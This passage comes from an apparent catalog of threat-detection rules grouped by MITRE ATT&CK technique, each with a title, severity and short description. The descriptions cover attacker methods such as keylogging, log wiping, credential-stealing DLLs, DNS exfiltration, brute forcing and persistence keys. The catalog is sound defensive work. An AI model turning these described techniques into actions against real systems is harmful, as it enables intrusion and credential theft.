    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
attack.t1132.001 4
Show Rules (4)
  • Suspicious FromBase64String Usage On Gzip Archive - Ps Script - Level: medium
    Description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
  • DNS Exfiltration and Tunneling Tools Execution - Level: high
    Description: Well-known DNS Exfiltration tools execution
  • Gzip Archive Decode Via PowerShell - Level: medium
    Description: Detects attempts of decoding encoded Gzip archives via PowerShell.
  • Suspicious FromBase64String Usage On Gzip Archive - Process Creation - Level: medium
    Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
attack.t1070.005 4
Show Rules (4)
  • PowerShell Deleted Mounted Share - Level: medium
    Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
  • Unmount Share Via Net.EXE - Level: low
    Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
  • Disable Administrative Share Creation at Startup - Level: medium
    Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
  • MaxMpxCt Registry Value Changed - Level: low
    Description: Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
attack.t1491.001 4
Show Rules (4)
  • Replace Desktop Wallpaper by Powershell - Level: low
    Description: An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper
  • Potentially Suspicious Desktop Background Change Using Reg.EXE - Level: medium
    Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • Potentially Suspicious Desktop Background Change Via Registry - Level: medium
    Description: Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • Potential Ransomware Activity Using LegalNotice Message - Level: high
    Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
attack.t1546.007 4
Show Rules (4)
  • Potential Persistence Via Netsh Helper DLL - Level: medium
    Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Potential Persistence Via Netsh Helper DLL - Registry - Level: medium
    Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
  • New Netsh Helper DLL Registered From A Suspicious Location - Level: high
    Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
attack.t1547.010 4
Show Rules (4)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Add Port Monitor Persistence in Registry - Level: medium
    Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
  • Bypass UAC Using Event Viewer - Level: high
    Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
  • Default RDP Port Changed to Non Standard Port - Level: high
    Description: Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
attack.t1546.012 3
Show Rules (3)
  • SilentProcessExit Monitor Registration - Level: high
    Description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process
  • Potential Persistence Via App Paths Default Property - Level: high
    Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application's executable file name to that file's fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
  • Potential Persistence Via GlobalFlags - Level: high
    Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
attack.t1059.009 3
Show Rules (3)
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation - Level: high
    Description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
  • AWS IAM S3Browser LoginProfile Creation - Level: high
    Description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
  • AWS IAM S3Browser User or AccessKey Creation - Level: high
    Description: Detects S3 Browser utility creating IAM User or AccessKey.
attack.t1098.001 3
Show Rules (3)
  • Added Credentials to Existing Application - Level: high
    Description: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
  • Github Outside Collaborator Detected - Level: medium
    Description: Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
  • Okta Identity Provider Created - Level: medium
    Description: Detects when a new identity provider is created for Okta.
attack.t1027.001 3
Show Rules (3)
  • Binary Padding - Linux - Level: high
    Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
  • Binary Padding - MacOS - Level: high
    Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
  • Failed Code Integrity Checks - Level: informational
    Description: Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.
attack.t1056.001 3
Show Rules (3)
  • Linux Keylogging with Pam.d - Level: high
    Description: Detect attempt to enable auditing of TTY input
  • Powershell Keylogging - Level: medium
    Description: Adversaries may log user keystrokes to intercept credentials as the user types them.
  • Potential Keylogger Activity - Level: medium
    Description: Detects PowerShell scripts that contains reference to keystroke capturing functions
attack.t1552.003 3
Show Rules (3)
  • Suspicious History File Operations - Linux - Level: medium
    Description: Detects commandline operations on shell history files
  • Suspicious History File Operations - Level: medium
    Description: Detects commandline operations on shell history files
  • Cisco Show Commands Input - Level: medium
    Description: See what commands are being input into the device by other people, full credentials can be in the history
attack.t1070.002 3
Show Rules (3)
  • Clear Linux Logs - Level: medium
    Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
  • Commands to Clear or Remove the Syslog - Level: high
    Description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks
  • Indicator Removal on Host - Clear Mac System Logs - Level: medium
    Description: Detects deletion of local audit logs
attack.t1592.004 3
Show Rules (3)
  • Cat Sudoers - Level: medium
    Description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights
  • Print History File Contents - Level: medium
    Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
  • Linux Recon Indicators - Level: high
    Description: Detects events with patterns found in commands used for reconnaissance on linux systems
attack.t1078.001 3
Show Rules (3)
  • Root Account Enable Via Dsenableroot - Level: medium
    Description: Detects attempts to enable the root account via "dsenableroot"
  • Guest Account Enabled Via Sysadminctl - Level: low
    Description: Detects attempts to enable the guest account using the sysadminctl utility
  • Admin User Remote Logon - Level: low
    Description: Detect remote login by Administrator user (depending on internal pattern).
attack.t1056.002 3
Show Rules (3)
  • GUI Input Capture - macOS - Level: low
    Description: Detects attempts to use system dialog prompts to capture user credentials
  • CredUI.DLL Loaded By Uncommon Process - Level: medium
    Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
  • PUA - Mouse Lock Execution - Level: medium
    Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
attack.t1497.001 3
Show Rules (3)
  • System Information Discovery Via Sysctl - MacOS - Level: medium
    Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
  • System Information Discovery Using System_Profiler - Level: medium
    Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
  • Powershell Detect Virtualization Environment - Level: medium
    Description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
attack.t1102.002 3
Show Rules (3)
  • Telegram Bot API Request - Level: medium
    Description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
  • Telegram API Access - Level: medium
    Description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent
  • Potentially Suspicious Azure Front Door Connection - Level: medium
    Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
attack.t1547.004 3
Show Rules (3)
  • MITRE BZAR Indicators for Persistence - Level: medium
    Description: Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.
  • Winlogon Helper DLL - Level: medium
    Description: Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.
  • Winlogon Notify Key Logon Persistence - Level: high
    Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
attack.t1499.004 3
Show Rules (3)
  • Apache Segmentation Fault - Level: high
    Description: Detects a segmentation fault error message caused by a crashing apache worker process
  • Nginx Core Dump - Level: high
    Description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
attack.t1090.003 3
Show Rules (3)
  • Query Tor Onion Address - DNS Client - Level: high
    Description: Detects DNS resolution of an .onion address related to Tor routing networks
  • DNS Query Tor .Onion Address - Sysmon - Level: high
    Description: Detects DNS queries to an ".onion" address related to Tor routing networks
  • Tor Client/Browser Execution - Level: high
    Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
attack.t1505.002 3
Show Rules (3)
  • MSExchange Transport Agent Installation - Builtin - Level: medium
    Description: Detects the Installation of a Exchange Transport Agent
  • Failed MSExchange Transport Agent Installation - Level: high
    Description: Detects a failed installation of a Exchange Transport Agent
  • MSExchange Transport Agent Installation - Level: medium
    Description: Detects the Installation of a Exchange Transport Agent
attack.t1001.003 3
Show Rules (3)
  • Suspicious LDAP-Attributes Used - Level: high
    Description: Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
  • ADSI-Cache File Creation By Uncommon Tool - Level: medium
    Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
attack.t1136.002 3
Show Rules (3)
  • Suspicious Windows ANONYMOUS LOGON Local Account Created - Level: high
    Description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • Manipulation of User Computer or Group Security Principals Across AD - Level: medium
    Description: Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..
attack.t1110.001 3
Show Rules (3)
  • Suspicious Rejected SMB Guest Logon From IP - Level: medium
    Description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service
  • Suspicious Connection to Remote Account - Level: low
    Description: Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
  • HackTool - Hydra Password Bruteforce Execution - Level: high
    Description: Detects command line parameters used by Hydra password guessing hack tool
attack.t1055.012 3
Show Rules (3)
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • Potential Process Hollowing Activity - Level: medium
    Description: Detects when a memory process image does not match the disk image, indicative of process hollowing.
  • Potential Pikabot Hollowing Activity - Level: high
    Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
attack.t1036.007 3
Show Rules (3)
  • Suspicious Double Extension Files - Level: high
    Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
  • Suspicious LNK Double Extension File Created - Level: medium
    Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
  • Suspicious Parent Double Extension File Execution - Level: high
    Description: Detect execution of suspicious double extension files in ParentCommandLine
attack.t1546.013 3
Show Rules (3)
  • PowerShell Profile Modification - Level: medium
    Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
  • VsCode Powershell Profile Modification - Level: medium
    Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
  • Potential Persistence Via PowerShell User Profile Using Add-Content - Level: medium
    Description: Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence
attack.t1556.002 3
Show Rules (3)
  • Powershell Install a DLL in System Directory - Level: high
    Description: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
  • Dropping Of Password Filter DLL - Level: medium
    Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
attack.t1553.005 3
Show Rules (3)
  • Suspicious Invoke-Item From Mount-DiskImage - Level: medium
    Description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
  • Suspicious Mount-DiskImage - Level: low
    Description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
  • Suspicious Unblock-File - Level: medium
    Description: Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
attack.t1564.003 3
Show Rules (3)
  • Suspicious PowerShell WindowStyle Option - Level: medium
    Description: Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
  • HackTool - Covenant PowerShell Launcher - Level: high
    Description: Detects suspicious command lines used in Covenant luanchers
  • PUA - AdvancedRun Execution - Level: medium
    Description: Detects the execution of AdvancedRun utility
attack.t1546.001 3
Show Rules (3)
  • Change Default File Association Via Assoc - Level: low
    Description: Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
  • Change Default File Association To Executable Via Assoc - Level: high
    Description: Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
  • Shell Open Registry Keys Manipulation - Level: high
    Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
attack.t1134.003 3
Show Rules (3)
  • HackTool - Impersonate Execution - Level: medium
    Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
  • HackTool - SharpImpersonation Execution - Level: high
    Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
  • HackTool - SharpDPAPI Execution - Level: high
    Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
attack.t1037.001 3
Show Rules (3)
  • Potential Persistence Via Logon Scripts - CommandLine - Level: high
    Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
  • Uncommon Userinit Child Process - Level: high
    Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
  • Potential Persistence Via Logon Scripts - Registry - Level: medium
    Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
attack.t1546.004 2
Show Rules (2)
  • Edit of .bash_profile and .bashrc - Level: medium
    Description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
  • Unix Shell Configuration Modification - Level: medium
    Description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.
attack.t1127.001 2
Show Rules (2)
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • Silenttrinity Stager Msbuild Activity - Level: high
    Description: Detects a possible remote connections to Silenttrinity c2
attack.t1087.004 2
Show Rules (2)
  • RBAC Permission Enumeration Attempt - Level: low
    Description: Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.
  • Discovery Using AzureHound - Level: high
    Description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
attack.t1505.001 2
Show Rules (2)
  • Suspicious SQL Query - Level: medium
    Description: Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader - Level: high
    Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
attack.t1078.002 2
Show Rules (2)
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure - Level: high
    Description: Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
  • Admin User Remote Logon - Level: low
    Description: Detect remote login by Administrator user (depending on internal pattern).
attack.t1566.002 2
Show Rules (2)
  • Potential Malicious Usage of CloudTrail System Manager - Level: high
    Description: Detect when System Manager successfully executes commands against an instance.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
attack.t1556.006 2
Show Rules (2)
  • Azure AD Only Single Factor Authentication Required - Level: low
    Description: Detect when users are authenticating without MFA being required.
  • Okta MFA Reset or Deactivated - Level: medium
    Description: Detects when an attempt at deactivating or resetting MFA.
attack.t1591.004 2
Show Rules (2)
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
attack.t1195.001 2
Show Rules (2)
  • Outdated Dependency Or Vulnerability Alert Disabled - Level: high
    Description: Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.
  • Octopus Scanner Malware - Level: high
    Description: Detects Octopus Scanner Malware.
attack.t1574.006 2
Show Rules (2)
  • Modification of ld.so.preload - Level: high
    Description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
  • Code Injection by ld.so Preload - Level: high
    Description: Detects the ld.so preload persistence file. See `man ld.so` for more information.
attack.t1543.002 2
Show Rules (2)
  • Systemd Service Reload or Start - Level: low
    Description: Detects a reload or a start of a service.
  • Systemd Service Creation - Level: medium
    Description: Detects a creation of systemd services which could be used by adversaries to execute malicious code.
attack.t1204.001 2
Show Rules (2)
  • Symlink Etc Passwd - Level: high
    Description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
attack.t1548.001 2
Show Rules (2)
  • PwnKit Local Privilege Escalation - Level: high
    Description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs
  • Setuid and Setgid - Level: low
    Description: Detects suspicious change of file privileges with chown and chmod commands
attack.t1548.003 2
Show Rules (2)
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin - Level: critical
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • Sudo Privilege Escalation CVE-2019-14287 - Level: high
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
attack.t1568.002 2
Show Rules (2)
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
attack.t1593.003 2
Show Rules (2)
  • Suspicious Git Clone - Linux - Level: medium
    Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
  • Suspicious Git Clone - Level: medium
    Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
attack.t1543.001 2
Show Rules (2)
  • Launch Agent/Daemon Execution Via Launchctl - Level: medium
    Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
  • Potential Persistence Via PlistBuddy - Level: high
    Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
attack.t1543.004 2
Show Rules (2)
  • Launch Agent/Daemon Execution Via Launchctl - Level: medium
    Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
  • Potential Persistence Via PlistBuddy - Level: high
    Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
attack.t1137.002 2
Show Rules (2)
  • Suspicious Microsoft Office Child Process - MacOS - Level: high
    Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
  • Office Application Startup - Office Test - Level: medium
    Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
attack.t1102.003 2
Show Rules (2)
  • PwnDrp Access - Level: critical
    Description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
  • Raw Paste Service Access - Level: high
    Description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
attack.t1090.002 2
Show Rules (2)
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • Network Communication Initiated To Portmap.IO Domain - Level: medium
    Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
attack.t1055.003 2
Show Rules (2)
  • Remote Thread Creation In Uncommon Target Image - Level: medium
    Description: Detects uncommon target processes for remote thread creation
  • HackTool - LittleCorporal Generated Maldoc Injection - Level: high
    Description: Detects the process injection of a LittleCorporal generated Maldoc.
attack.t1036.002 2
Show Rules (2)
  • Potential File Extension Spoofing Using Right-to-Left Override - Level: high
    Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
  • Potential Defense Evasion Via Right-to-Left Override - Level: high
    Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.
attack.t1542.001 2
Show Rules (2)
  • UEFI Persistence Via Wpbbin - FileCreation - Level: high
    Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
  • UEFI Persistence Via Wpbbin - ProcessCreation - Level: high
    Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
attack.t1574.012 2
Show Rules (2)
  • Registry-Free Process Scope COR_PROFILER - Level: medium
    Description: Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)
  • Enabling COR Profiler Environment Variables - Level: medium
    Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
attack.t1564.006 2
Show Rules (2)
  • Suspicious Hyper-V Cmdlets - Level: medium
    Description: Adversaries may carry out malicious operations using a virtual instance to avoid detection
  • Detect Virtualbox Driver Installation OR Starting Of VMs - Level: low
    Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
attack.t1027.009 2
Show Rules (2)
  • Powershell Token Obfuscation - Powershell - Level: high
    Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
  • Powershell Token Obfuscation - Process Creation - Level: high
    Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
attack.t1574.005 2
Show Rules (2)
  • HackTool - SharpUp PrivEsc Tool Execution - Level: critical
    Description: Detects the use of SharpUp, a tool for local privilege escalation
  • Setup16.EXE Execution With Custom .Lst File - Level: medium
    Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility.
attack.t1216.001 2
Show Rules (2)
  • Launch-VsDevShell.PS1 Proxy Execution - Level: medium
    Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
  • Pubprn.vbs Proxy Execution - Level: medium
    Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
attack.t1218.013 2
Show Rules (2)
  • Mavinject Inject DLL Into Running Process - Level: high
    Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
  • Renamed Mavinject.EXE Execution - Level: high
    Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
attack.t1563.002 2
Show Rules (2)
  • Potential MSTSC Shadowing Activity - Level: high
    Description: Detects RDP session hijacking by using MSTSC shadowing
  • Suspicious RDP Redirect Using TSCON - Level: high
    Description: Detects a suspicious RDP session redirect using tscon.exe
attack.t1546.009 2
Show Rules (2)
  • New DLL Added to AppCertDlls Registry Key - Level: medium
    Description: Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
  • Session Manager Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
attack.t1553.003 2
Show Rules (2)
  • Persistence Via New SIP Provider - Level: medium
    Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
  • Kapeka Backdoor Configuration Persistence - Level: medium
    Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
attack.t1036.004 2
Show Rules (2)
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
attack.t1070.008 2
Show Rules (2)
